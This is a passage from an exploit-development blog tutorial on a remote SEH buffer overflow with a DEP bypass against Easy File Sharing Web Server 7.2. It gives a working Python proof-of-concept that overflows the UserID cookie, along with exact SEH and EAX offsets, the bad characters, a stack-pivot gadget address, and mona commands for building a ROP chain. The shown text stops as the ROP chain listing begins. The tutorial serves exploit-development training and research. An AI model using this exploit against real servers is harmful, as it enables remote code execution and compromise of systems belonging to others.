</span><span class='line'>
</span><span class='line'><span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">1</span><span class="p">:</span>
</span><span class='line'>    <span class="k">print</span> <span class="s">&quot;Usage: python efsws.py [host] [port]&quot;</span>
</span><span class='line'>    <span class="nb">exit</span><span class="p">()</span>
</span><span class='line'>
</span><span class='line'><span class="n">host</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
</span><span class='line'><span class="n">port</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="nb">buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="mi">5000</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="n">httpreq</span> <span class="o">=</span> <span class="p">(</span>
</span><span class='line'><span class="s">&quot;GET /changeuser.ghp HTTP/1.1</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;User-Agent: Mozilla/4.0</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Host:&quot;</span> <span class="o">+</span> <span class="n">host</span> <span class="o">+</span> <span class="s">&quot;:&quot;</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">port</span><span class="p">)</span> <span class="o">+</span> <span class="s">&quot;</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Accept-Language: en-us</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Accept-Encoding: gzip, deflate</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Referer: http://&quot;</span> <span class="o">+</span> <span class="n">host</span> <span class="o">+</span> <span class="s">&quot;/</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Cookie: SESSIONID=6771; UserID=&quot;</span> <span class="o">+</span> <span class="nb">buffer</span> <span class="o">+</span> <span class="s">&quot;; PassWD=;</span><span class="se">\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;Conection: Keep-Alive</span><span class="se">\r\n\r\n</span><span class="s">&quot;</span>
</span><span class='line'><span class="p">)</span>
</span><span class='line'>
</span><span class='line'>
</span><span class='line'><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
</span><span class='line'><span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
</span><span class='line'><span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">httpreq</span><span class="p">)</span>
</span><span class='line'><span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></code></pre></td></tr></table></div></figure>


<p>So, in simple terms, we&rsquo;re sending 5000 &ldquo;A&#8221;s in the <code>UserID</code> cookie as a part of GET request sent to the server to trigger a crash.</p>

<h2>Understanding the crash</h2>

<p>Let&rsquo;s trigger the crash and investigate it. Start the server:</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/server_start.png" alt="Server_start PNG" /></p>

<p>Attach Immunity Debugger to the process (<code>File</code> -> <code>Attach</code> -> Select the <code>fsws</code> process -> <code>F9</code> to run it)</p>

<p>Run the exploit from the command line: <code>python poc.py 127.0.0.1 80</code>.</p>

<p>Boom! Crash!</p>

<p><a href="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/first_crash.png"><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/first_crash.png" alt="First_crash PNG" /></a></p>

<p>Notice the line at the bottom saying:</p>

<p><em>Access violation when reading [0000004B] - Use Shift+F7/F8/F9 to pass exception to program</em></p>

<p>This indicates that we have triggered an exception that can be handled by the program. Cool, let&rsquo;s see what&rsquo;s happening in the SEH chain: select <code>View</code> -> <code>SEH Chain</code>.</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/first_crash-seh_overwrite.png" alt="First_crash-SEH_overwrite PNG" /></p>

<p>Awesome news! We have managed to overwrite SEH pointers with our own data and, through this, we&rsquo;ll be able to control execution flow of the program.</p>

<p>But, what exactly triggers the crash? Have a look at the screenshot again - note the value in <code>EAX</code> register - <code>0x41414141</code> and current instruction that&rsquo;s being executed at the address <code>61C277F6</code>- <code>CMP DWORD PTR DS:[EAX+4C],A029A697</code>.</p>

<p>What happened? We were trying to access value at the memory address of <code>EAX + 4C</code>, since EAX is currently <code>0x41414141</code>, which is not a valid address, we can&rsquo;t read from it (or rather, to be specific, we can&rsquo;t read from <code>0x41414141 + 4C</code>) and hence, our program crashes.</p>

<p>To make sure our exploit is reliable and always triggers a crash, we&rsquo;ll have to make sure to always overwrite <code>EAX</code> with an invalid memory address - let&rsquo;s keep that in mind!</p>

<h2>Offsets</h2>

<p>Cool, so now we know why our program crashes. Next step is to calculate offsets to find out what&rsquo;s where and how much data we need to send to overwrite everything of interest to us (<code>EAX</code> register and <code>SEH</code> pointers).</p>

<p>Normally, it would be a painful and cumbersome process, but here comes <code>mona</code> with help (and it will continue helping us out even more later on). In the command field in the Immunity, type in <code>!mona pc 5000</code> to create a circular pattern of 5000 characters to use in our buffer to then be able to automatically find the offsets.</p>

<p>Mona will create a text file with the pattern in a text file <code>pattern.txt</code> under your mona logs directory.</p>

<p>Copy the generated string into the buffer in your exploit (now the buffer should only contain the pattern), start the server again, attach Immunity to it and trigger the crash by running the PoC script (we&rsquo;ll be doing this over and over and over again, so get used to it).</p>

<p>The program should have crashed again, but now <code>EAX</code> and <code>SEH</code> chain have some other values. That&rsquo;s all good - now lets get <code>mona</code> to do the hard work for us and calculate all offsets. Type in <code>!mona findmsp</code> and see what it will come back with.</p>

<p><a href="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/findmsp.png"><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/findmsp.png" alt="findmsp PNG" /></a></p>

<p>Awesome, we have now all infromation about offsets required for our exploit:</p>

<ul>
<li><code>EAX</code> offset is <em>4183</em></li>
<li><code>SEH</code> offset is <em>4059</em></li>
</ul>


<p>Let&rsquo;s rewrite part of the exploit and see if we can overwrite speicifc registers with specific values, consider the following, improved PoC:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c"># Offsets</span>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">5000</span>
</span><span class='line'><span class="n">seh_offset</span> <span class="o">=</span> <span class="mi">4059</span>
</span><span class='line'><span class="n">eax_offset</span> <span class="o">=</span> <span class="mi">4183</span>
</span><span class='line'>
</span><span class='line'><span class="nb">buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">seh_offset</span>                   <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>                          <span class="c"># overwrite nSEH pointer</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;CCCC&quot;</span>                          <span class="c"># overwrite SEH record</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">eax_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>  <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;DDDD&quot;</span>                          <span class="c"># overwrite EAX to always trigger an exception</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">max_size</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>    <span class="c"># padding</span>
</span></code></pre></td></tr></table></div></figure>


<p>If you trigger the crash again, you should see that <code>EAX</code> is now <code>0x44444444</code> and SEH record is <code>0x43434343</code> (nSEH will be <code>0x42424242</code>, but because we are dealing with DEP, it&rsquo;s not of interest for us in this particular exploit).</p>

<p><a href="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/offsets.png"><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/offsets.png" alt="offsets PNG" /></a></p>

<h2>Bad characters</h2>

<p>Now, next step is to find out which bad characters will stuff up our payload. In this case, because we need to send an entire GET request, it is easy to predict that <code>\x00</code> will be a bad character, as it denotes end of string and will cut our payload short.</p>

<p>We can automatically exclude the NULL byte, but are there any others? Let&rsquo;s find out now, before we start playing with ROP and choosing addresses that may contain bytes that will be messing up our payload.</p>

<p>Let&rsquo;s generate a bytearray (and exclude NULL byte) with <code>!mona bytearray -cpb '\x00'</code>. It will create 2 files, <code>bytearray.txt</code> and <code>bytearray.bin</code>. Copy-paste generated string from <code>bytearray.txt</code> into the exploit <strong>AFTER</strong> the part of overwriting <code>EAX</code> register.</p>

<p>Why? Because to trigger the crash, we want to overwrite <code>EAX</code>, if we put bytearray with potentially bad characters before we overwrite the <code>EAX</code> to trigger a crash, bad character that we don&rsquo;t know of may actually cut our payload short and we&rsquo;ll never trigger the crash!</p>

<p>Our buffer should look like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="nb">buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">seh_offset</span>                    <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>                          <span class="c"># overwrite nSEH pointer</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;CCCC&quot;</span>                          <span class="c"># overwrite SEH record</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">eax_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>  <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;DDDD&quot;</span>                          <span class="c"># overwrite EAX to always trigger an exception</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="p">(</span><span class="s">&quot;</span><span class="se">\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0</span><span class="s">&quot;</span>
</span><span class='line'><span class="s">&quot;</span><span class="se">\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff</span><span class="s">&quot;</span><span class="p">)</span>
</span></code></pre></td></tr></table></div></figure>


<p>Trigger the crash again and investigate the stack, trying to find an address where the bytearray starts:</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/bad_chars_compare.png" alt="bad_chars PNG" /></p>

<p>Now, use mona to find bad chars (it will compare what it sees on the stack with what&rsquo;s in the generated <code>bytearray.bin</code> file):</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona compare -f C:\mona_logs\fsws\bytearray.bin -a 0x02EC6F34</span></code></pre></td></tr></table></div></figure>


<p>Where:</p>

<ul>
<li><strong>-f C:\mona_logs\fsws\bytearray.bin</strong> is location of the bytearray binary (the baseline, expected array)</li>
<li><strong>-a 0x02EC6F34</strong> is an exact address of where our bytearray starts from on the stack</li>
</ul>


<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/bad_char_found.png" alt="bad_char_found PNG" /></p>

<p>Ok, mona found additional bad character - <code>\x3b</code>. Let&rsquo;s repeat above process, remembering to now exclude <code>\x00</code> and <code>\x3b</code> from the bytearray and see if there are any more bad characters. The results should be as below:</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/no_more_bad_chars.png" alt="no_more_bad_chars PNG" /></p>

<p>That&rsquo;s it - the bad characters we will have to avoid in our payload are <code>\x00</code> and <code>\x3b</code>.</p>

<h2>Stack pivoting</h2>

<p>Alright, finally we&rsquo;re getting to the more exciting parts! So far it was kind of a general stuff that needs to be done every time you develop an exploit. Don&rsquo;t get me wrong, these were super important tasks that lay out nice foundations for our further work, so always make sure you get your offsets and bad chars out of the way early and are confident and happy about what&rsquo;s happening in the program.</p>

<p>To continue further, we need to understand what happens in the program when the exception is triggered:</p>

<ul>
<li>ESP is moved further &ldquo;up&rdquo; (towards lower addresses of the memory)</li>
<li>command execution is directed to the address in the SEH record (which we control!)</li>
</ul>


<p>Keeping in mind that we&rsquo;re dealing with DEP (we can&rsquo;t simply execute commands on the stack), we need to come up with a ROP chain to get around that.</p>

<p>However, we have an issue to deal with - ESP has been moved far away from the area on the stack that we control, hence, our future ROP chain would not be executed as we&rsquo;re simply not there on the stack.</p>

<p>To visualise what I&rsquo;m talking about, start the program and trigger a crash. As the program crashes, press <code>ctrl</code> + <code>F9</code> to pass execution of the exception code to the program.</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/seh_error.png" alt="seh_error PNG" /></p>

<p>What happened there was:</p>

<ul>
<li>Program tried to execute instruction at the address <code>0x43434343</code> (SEH record), which is invalid address, so that failed, and triggered another exception, which was handled by the system level exception handler</li>
<li>ESP was moved all the way &ldquo;up&rdquo; towards lower addresses</li>
</ul>


<p>What we&rsquo;ll have to do now is to simply move ESP back to the address space we control. To do this, we need to find a single command that will move ESP a certain distance down the stack (towards higher memory addresses) to land in the area of our buffer.</p>

<p>First, we need to calculate how much we need to jump - simply right click on the stack addresses and choose <code>Address</code> -> <code>Relative to ESP</code> and scroll all the way down the stack till you notice data from the buffer (lots of &ldquo;A&#8221;s or <code>0x41</code>).</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/stack_pivot.png" alt="stack_pivot PNG" /></p>

<p>Looking at this, we need to move ESP somewhere around at least <code>0x9F4</code> (decimal 2548) bytes &ldquo;down&rdquo; the stack.</p>

<p>Once again, <code>mona</code> comes with help - at the time of the crash run the following command to generate list of stack pivots that we could use:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona stackpivot -distance 2548 -cpb '\x00\x3b'</span></code></pre></td></tr></table></div></figure>


<p>Where:</p>

<ul>
<li><strong>-distance 2548</strong> specifies minimum number of bytes to jump - only instructions that jump at least that many bytes will be returned</li>
<li><strong>-cpb &lsquo;\x00\x3b&rsquo;</strong> removes instructions which addresses contain bad characters that would break our exploit</li>
</ul>


<p>Mona will generate a text file <code>stackpivot.txt</code> containing list of potential pivots to use and put it in the mona logs directory.</p>

<p>Open the file and try to find a single instruction that addresses our needs.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>0x1002280a : {pivot 4100 / 0x1004} :  # ADD ESP,1004 # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}</span></code></pre></td></tr></table></div></figure>


<p>It will move the ESP &ldquo;down&rdquo; 4100 bytes, a lot more than we needed, however, it is the smallest one available that fits our needs. Luckily we have plenty of space on the buffer to play with, so in this case, it actually will work fine.</p>

<p>Let&rsquo;s update our exploit to, instead overwriting SEH with garbage, execute the pivot! Once we run the application and trigger the crash, after passing execution back to the program, we should land back on our buffer.</p>

<p>The PoC now looks like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c"># Offsets</span>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">5000</span>
</span><span class='line'><span class="n">seh_offset</span> <span class="o">=</span> <span class="mi">4059</span>
</span><span class='line'><span class="n">eax_offset</span> <span class="o">=</span> <span class="mi">4183</span>
</span><span class='line'>
</span><span class='line'><span class="nb">buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">seh_offset</span>                   <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>                          <span class="c"># overwrite nSEH pointer</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0x1002280a</span><span class="p">)</span>      <span class="c"># overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">eax_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>  <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;DDDD&quot;</span>                          <span class="c"># overwrite EAX to always trigger an exception</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">max_size</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>    <span class="c"># padding</span>
</span></code></pre></td></tr></table></div></figure>


<p>And that&rsquo;s the result:</p>

<p><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/pivot_success.png" alt="pivot_success PNG" /></p>

<p>Now we just need to find out where exactly are we landing on our buffer after the pivot. I guess you could use the offset trick from before or just do some maths manually - turns out that we land exactly <strong>2455</strong> bytes into our buffer, let&rsquo;s keep that in mind and cater for that.</p>

<h2>ROP</h2>

<p>Alright, the most exciting part of the exploit development! <em>ROP ROP ROP your boat, gently down the stream&hellip;</em> :-)</p>

<p>Let&rsquo;s plan the attack! What we&rsquo;ll need to do is come up with a ROP chain that will disable DEP for us. Luckily, Windows already gives us 2 functions we can call (<a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898%28v=vs.85%29.aspx">VirtualProtect</a> and <a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa366887%28v=vs.85%29.aspx">VirtualAlloc</a>) to achieve this.</p>

<p>They both take quite a few parameters, so, the main task will be to provide them reliably. In cases like this, there&rsquo;s also another neat trick that we can use - using <code>PUSHAD</code> opcode. What it does, it takes values from all of the registers and pushes them on the stack for us. If we can carefully put required values into apropraite registers and call <code>PUSHAD</code>, the registers will be pushed on the stack and, if we then call <code>VirtualProtect</code> function, the values from the stack will be taken as parameters to the function!</p>

<p>As long as we have right values in the right registers (i.e. providing them in a right order to <code>VirutalProtect</code>) it will execute the function correctly! After disabling DEP with ROP, we can simply put the our shellcode right after the ROP chain and it will be successfully executed from the stack.</p>

<p>Before we jump into more details, let&rsquo;s see how our buffer should look like now:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class='python'><span class='line'><span class="c"># Offsets</span>
</span><span class='line'><span class="n">rop_offset</span> <span class="o">=</span> <span class="mi">2455</span>
</span><span class='line'><span class="n">max_size</span> <span class="o">=</span> <span class="mi">5000</span>
</span><span class='line'><span class="n">seh_offset</span> <span class="o">=</span> <span class="mi">4059</span>
</span><span class='line'><span class="n">eax_offset</span> <span class="o">=</span> <span class="mi">4183</span>
</span><span class='line'>
</span><span class='line'><span class="nb">buffer</span> <span class="o">=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="n">rop_offset</span>                       <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">create_rop_chain</span><span class="p">()</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">shellcode</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">seh_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>      <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;BBBB&quot;</span>                              <span class="c"># overwrite nSEH pointer</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0x1002280a</span><span class="p">)</span>          <span class="c"># overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">eax_offset</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>      <span class="c"># padding</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">&quot;&lt;I&quot;</span><span class="p">,</span> <span class="mh">0xffffffff</span><span class="p">)</span>          <span class="c"># overwrite EAX to always trigger an exception</span>
</span><span class='line'><span class="nb">buffer</span> <span class="o">+=</span> <span class="s">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="n">max_size</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="nb">buffer</span><span class="p">))</span>        <span class="c"># padding</span>
</span></code></pre></td></tr></table></div></figure>


<p>Once again, <code>mona</code> comes with great help for us - it can actually generate a ROP chain for us (or at least majority of it) making the task a bit simpler.</p>

<p>Run the program, trigger the crash, pass the execution to the program (it will crash again on incorrect EIP) and run <code>!mona modules</code> to find out what DLLs are loaded by the application and if there any restrictions on them.</p>

<p><a href="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/mona_modules.png"><img src="http://blog.knapsy.com/images/posts/2015-11-25-easy-file-sharing-web-server-v7-dot-2-remote-seh-buffer-overflow-dep-bypass-with-rop/mona_modules.png" alt="mona modules PNG" /></a></p>

<p>From the above, we can see that there&rsquo;s bunch of modules loaded, but the ones we are the most interested in, are the ones that are <strong>non-ASLR</strong> and <strong>not rebased</strong>.</p>

<p>It appears that there 2 modules like this <code>fsws.exe</code> and <code>sqlite3.dll</code> - we&rsquo;ll use them to find our ROP gadgets.</p>

<p>Also, a good thing is that they&rsquo;re both application DLLs (not system ones), meaning that they will always be loaded unchanged, regardless of the operating system flavour, hence, our exploit should be quite reliable and cross-platform (hopefully!).</p>

<p>With that in mind, we can now execute the following:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>!mona rop -m sqlite3.dll,fsws.exe -cpb '\x00\x3b'</span></code></pre></td></tr></table></div></figure>


<p>Where:</p>

<ul>
<li><strong>-m sqlite3.dll,fsws.exe</strong> specifies modules (<code>sqlite3.dll</code> and <code>fsws.exe</code>) in which we want to look for gadgets</li>
<li><strong>-cpb &lsquo;\x00\x3b&rsquo;</strong> ignores gadgets with addresses containing bad characters that would break our exploit</li>
</ul>


<p>Mona will generate bunch of files in it&rsquo;s logs directory:</p>

<ul>
<li><code>rop.txt</code> - containing list of various rop gadgets to use, categorised by the functionality</li>
<li><code>rop_suggestions.txt</code> - another list of various rop gadgets, generally more complex instructions</li>
<li><code>rop_chains.txt</code> - ready made ROP chains to disable DEP using <code>VirutalProtect</code> or <code>VirtualAlloc</code> functions</li>
</ul>


<p>Let&rsquo;s have a look at <code>rop_chains.txt</code> and see if there&rsquo;s something useful we could use:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
